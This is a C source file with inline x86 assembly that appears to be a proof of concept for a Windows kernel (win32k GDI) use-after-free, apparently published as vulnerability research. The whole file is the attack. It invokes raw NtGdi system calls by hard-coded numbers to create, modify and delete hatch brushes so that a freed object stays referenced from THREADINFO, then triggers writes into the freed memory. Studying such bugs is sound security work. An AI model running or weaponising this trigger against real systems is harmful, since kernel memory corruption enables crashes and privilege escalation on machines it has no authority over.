/*
 * cl.exe bug320.cpp gdi32.lib
 */

#include <stdio.h>
#include <tchar.h>
#include <Windows.h>

__declspec(noinline) HBRUSH __stdcall NtGdiCreateHatchBrushInternal(DWORD dw1, DWORD dw2, DWORD dw3) {
 	__asm {
 		push dw3
 		push dw2
		push dw1
		push 0x0
		mov eax, 0x1026
		mov edx, 0x7ffe0300
		call dword ptr [edx]
		add esp, 0x10
	}
}

__declspec(noinline) HBRUSH __stdcall NtGdiSetRectRgn(HRGN hrgn, DWORD dw1, DWORD dw2, DWORD dw3, DWORD dw4) {
 	__asm {
 		push dw4
 		push dw3
 		push dw2
		push dw1
		push hrgn
		push 0x0
		mov eax, 0x1127
		mov edx, 0x7ffe0300
		call dword ptr [edx]
		add esp, 0x18
	}
}

__declspec(noinline) HRGN __stdcall NtGdiCreateRectRgn(DWORD dw1, DWORD dw2, DWORD dw3, DWORD dw4) {
 	__asm {
 		push dw4
 		push dw3
 		push dw2
		push dw1
		push 0x0
		mov eax, 0x102c
		mov edx, 0x7ffe0300
		call dword ptr [edx]
		add esp, 0x14
	}
}

__declspec(noinline) HBRUSH __stdcall NtGdiSetBrushAttributes(HBRUSH hbrush, DWORD dw1) {
 	__asm {
 		push dw1
 		push hbrush
		push 0x0
		mov eax, 0x1114
		mov edx, 0x7ffe0300
		call dword ptr [edx]
		add esp, 0xc
	}
}

__declspec(noinline) HBRUSH __stdcall NtGdiClearBrushAttributes(HBRUSH hbrush, DWORD dw1) {
 	__asm {
 		push dw1
 		push hbrush
		push 0x0
		mov eax, 0x1013
		mov edx, 0x7ffe0300
		call dword ptr [edx]
		add esp, 0xc
	}
}

__declspec(noinline) HBRUSH __stdcall NtGdiDeleteObjectApp(HANDLE h) {
 	__asm {
 		push h
		push 0x0
		mov eax, 0x107d
		mov edx, 0x7ffe0300
		call dword ptr [edx]
		add esp, 0x8
	}
}


int _tmain(int argc, _TCHAR* argv[])
{
	// to make sure it links against gdi32
	GdiFlush();
	
	// Setting up the brushes, will change the handle type few times
	HBRUSH hbrush1 = NtGdiCreateHatchBrushInternal(0x4,0xb4,0x1);
	printf("[-] hbrush1: %08x\n", hbrush1);
	HBRUSH hbrush2 = NtGdiSetBrushAttributes(hbrush1, 0x1);
	printf("[-] hbrush2: %08x\n", hbrush2);
	HBRUSH hbrush3 = NtGdiClearBrushAttributes(hbrush2, 0x1);
	printf("[-] hbrush3: %08x\n", hbrush3);
	NtGdiSetBrushAttributes(hbrush1, 0x1);
	NtGdiClearBrushAttributes(hbrush2, 0x1);

	// DeleteObjectApp will free the object and at the same time
	// set THREADINFO+0x10 to point into the freed object in
	// HmgFreeObjectAttr()
	NtGdiDeleteObjectApp(hbrush3);
	// object is freed now and pointer into object held in THREADINFO+0x10

	// retrieve the pointer in HmgAllocateObjectAttr() which also
	// triggers a write into the freed buffer
	HBRUSH hbrush4 = NtGdiCreateHatchBrushInternal(0x7,0x72,0x1);
	printf("[-] hbrush4: %08x\n", hbrush4);
	HBRUSH hbrush5 = NtGdiSetBrushAttributes(hbrush4, 0x1);
	printf("[-] hbrush5: %08x\n", hbrush5);
	NtGdiClearBrushAttributes(hbrush5, 0x1);
	
	// This will also trigger a write
	//HRGN hrgn  = NtGdiCreateRectRgn(1,2,3,4);
}
